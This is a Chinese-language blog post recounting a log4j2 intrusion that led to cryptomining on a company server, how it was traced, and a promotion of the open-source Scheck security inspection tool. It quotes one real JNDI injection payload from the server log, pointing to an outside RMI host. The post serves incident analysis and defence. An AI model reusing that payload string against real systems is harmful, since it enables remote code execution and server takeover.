您当前的位置:首页 > 电脑百科 > 安全防护 > 漏洞

排查 log4j2 安全漏洞的一次经历

时间:2022-08-17 10:26:44  来源:搜狐网  作者:观测云

简介

2021年底,技术圈被 log4j2 漏洞掀起巨浪,各大安全公司纷纷发文介绍该漏洞的危害,并给出了各种临时解决方案。还有一些博主也发表文章教我们如何找到易受攻击的地方,并采取相应的防御措施。还有大量帖子跟着起哄,讨论如何采用一些不必要的防御技术。12月29日,我们就发现了一起由 log4j2 漏洞引发的挖矿事件。

惊险时刻

收到安全告警

事情还是要从一条告警说起。12月29日 18:59,公司钉钉安全告警信息,亲!df_solution_ecs_002存在2 个 warn。由于warn 级别的告警不是很严重,所以当时我们没有太在意。

收到服务器CPU 99% 告警

19:34:00 收到安全告警30分钟后,钉钉群内突然收到CPU 飙升的告警。告警来的猝不及防,系统运行很长时间,怎么突发发生这种状况。

发现可疑进程

于是,我们赶紧登录我们的观测平台查看服务器基础信息。cpu 使用率太高了吧!同时我们发现进程监控中有5个恶意进程CPU使用率为100%。此刻我们才发现,我主机应该被挖矿了。马上通知相关同事进行处理,将恶意进程关闭。

追踪溯源

恶意进程处理完成后,心中一阵后怕,老大也下达了要查明事故原因的命令。此刻我一阵头大,我怎么查病毒入口?突然,脑中灵光一闪想到了刚刚安全告警。于是打开了安全巡检的页面,果然病毒注入留下了蛛丝马迹被Scheck巡检工具捕捉到。在12/29 18:52的时候发生5个以上的warn 安全告警事件,首先18:52病毒添加了免密登录,18:57添加了一个用户,之后有添加了二进制文件等等。

知道了入侵时间,我打算在18:40~18:53 之间查看一些突破,观测云可以根据当时时间查看当时服务器的状态,指标,还有日志。

终于在18:54左右的时候发现了这条日志,2021-12-29 18:50:23.906+0000 [id=66628] request param ${jndi:rmi://67.220.90.132:30023/test}0 ms。这不是那个最近这火的log4j 2的漏洞么!!!67.220.90.132地址还是美国加利福尼亚洛杉矶的。

最后,综合这些线索,我画了个时间图,发现黑客进行攻击的时候,我们Scheck就已经将恶意行为上报到了观测平台并进行告警。在那时,只是我们没有及时关注,还好我可以通过统一观测平台,进行分析和观测发现了源头。

强烈推荐

经历了此次事件,要感谢观测云的安全巡检工具Scheck,让我度过这次难关。服务器被入侵不可怕,可怕的不知道你是如何和入侵,黑客对主机做了哪些恶意操作,Scheck 可以实时监控主机安全事件。此软件安全可靠,支持二次开发,开源。是一款在运行用户本地机器上的一种安全巡检工具。

我们为什么推荐使用Scheck

1、安全

Scheck 是款开源软件,你可以放心使用。开源地址:https://github.com/GuanceCloud/scheck

Scheck 中的 Lua 不能引入第三方库,直接的文件 IO 也是被禁止的,只能通过 Golang 封装的 Lua 接口才能对文件进行读取

2、高度一致的跨平台可用性

在主流的 linuxwindows 上均可直接使用无需考虑平台兼容性

数据可观测性

Scheck 的巡检结果,可以直接导入观测云,也可以导入阿里云SLS日志

3、可扩展性

用户可以自定义新的巡检脚本,通过二次开发入口 即可方便的开发出新巡检脚本。

Scheck 的作用到底是什么

Scheck 作为一款运行用户本地机器上的一种安全巡检工具,他不做安全防护,但他们可以提前感知你的操作是否安全,主机被入侵时,黑客的恶意行为都会被Scheck 上报。你可以自己分析和观测,目前没有绝对安全的软件来保证你主机安全,但是Scheck可以保证黑客或其他的不安全的操作都会被记录和上报。

这就是我们强烈推荐 Scheck 原因!



Tags: log4j2   点击:()  评论:()
声明:本站部分内容及图片来自互联网,转载是出于传递更多信息之目的,内容观点仅代表作者本人,如有任何标注错误或版权侵犯请与我们联系(Email:2595517585@qq.com),我们将及时更正、删除,谢谢。
▌相关推荐
简介2021年底,技术圈被 log4j2 漏洞掀起巨浪,各大安全公司纷纷发文介绍该漏洞的危害,并给出了各种临时解决方案。还有一些博主也发表文章教我们如何找到易受攻击的地方,并采取相...【详细内容】
2022-08-17  Tags: log4j2  点击:(66)  评论:(0)  加入收藏
▌简易百科推荐
Python 编程语言中一个被忽视了 15 年的漏洞,正在重新引发人们的关注,因为它可能对超过 35 万个开源存储库项目造成影响。其实早在 2007 年,就已经有安全研究人员披露并标记过...【详细内容】
2022-09-22  cnBeta.COM     Tags:Python漏洞   点击:(34)  评论:(0)  加入收藏
安全分析与研究专注于全球恶意软件的分析与研究前言近日,国外某人在社交媒体论坛上宣称,自己的团队入侵了LockBit勒索病毒的服务器,并找到了LockBit Black(3.0)勒索病毒的生成...【详细内容】
2022-09-21  安全分析与研究   企鹅号  Tags:LockBit   点击:(26)  评论:(0)  加入收藏
nessus号称是漏洞评估领域的全球黄金标准、世界上最流行的漏洞扫描程序,广受 30000 家企业的信赖,全球下载量达 2 百万。Nessus不同于传统的漏洞扫描软件,它的每个功能的设计都...【详细内容】
2022-09-20  程序猿研究中心  今日头条  Tags:Nessus   点击:(41)  评论:(0)  加入收藏
IT之家 9 月 7 日消息,谷歌于 9 月 2 日发布了其 Chrome 浏览器的更新,其中包含针对 Mac 和 Windows 版漏洞的修复。Chrome 浏览器 105.0.5195.102 版本更新已推出,修复了一个...【详细内容】
2022-09-07    IT之家  Tags:0 day 漏洞   点击:(52)  评论:(0)  加入收藏
log4j-2远程代码执行漏洞是因为log4j的版本中存在jndi(java Naming and Directory Interface)注入漏洞,jndi注入是利用的动态类加载机制完成攻击的,当程序将用户输入的数据进...【详细内容】
2022-09-04  互联网资讯看板     Tags:log4j2   点击:(87)  评论:(0)  加入收藏
【摘要】 漏洞靶场,不仅可以帮助我们锻炼渗透测试能力、可以帮助我们分析漏洞形成机理、更可以学习如何修复提高代码能力,同时也可以帮助我们检测各种各样漏洞扫描器的效果。W...【详细内容】
2022-09-01  爱生活的VVGktA    Tags:Web漏洞   点击:(58)  评论:(0)  加入收藏
CVE-2022-22965A Spring MVC or Spring WebFlux application running on JDK 9+ may be vulnerable to remote code execution (RCE) via data binding. The specific explo...【详细内容】
2022-08-31  BYsususu    Tags:漏洞   点击:(67)  评论:(0)  加入收藏
安全研究人员发现有超过8万台海康威视摄像头受到CVE-2021-36260漏洞的影响。CVE-2021-36260漏洞是一个命令注入漏洞,攻击者利用该漏洞可以发送伪造的消息给有漏洞的web服务器...【详细内容】
2022-08-26  嘶吼RoarTalk  网易  Tags:漏洞   点击:(182)  评论:(0)  加入收藏
一、前言1.1 下载地址二、CVE-2017-175622.1 漏洞分析cve-2017-17562远程命令执行漏洞影响Goahead 2.5.0到Goahead 3.6.5之间的版本。在cgiHandler函数中,将用户的HTTP请求参...【详细内容】
2022-08-26  iHacking    Tags:漏洞   点击:(53)  评论:(0)  加入收藏
什么是0day漏洞? 0day漏洞,是指已经被发现,但是还未被公开,同时官方还没有相关补丁的漏洞;通俗的讲,就是除了黑客,没人知道他的存在,其往往具有很大的突发性、破坏性、致命性。0day...【详细内容】
2022-08-25  中科三方  搜狐号  Tags:0day漏洞   点击:(79)  评论:(0)  加入收藏
站内最新
站内热门
站内头条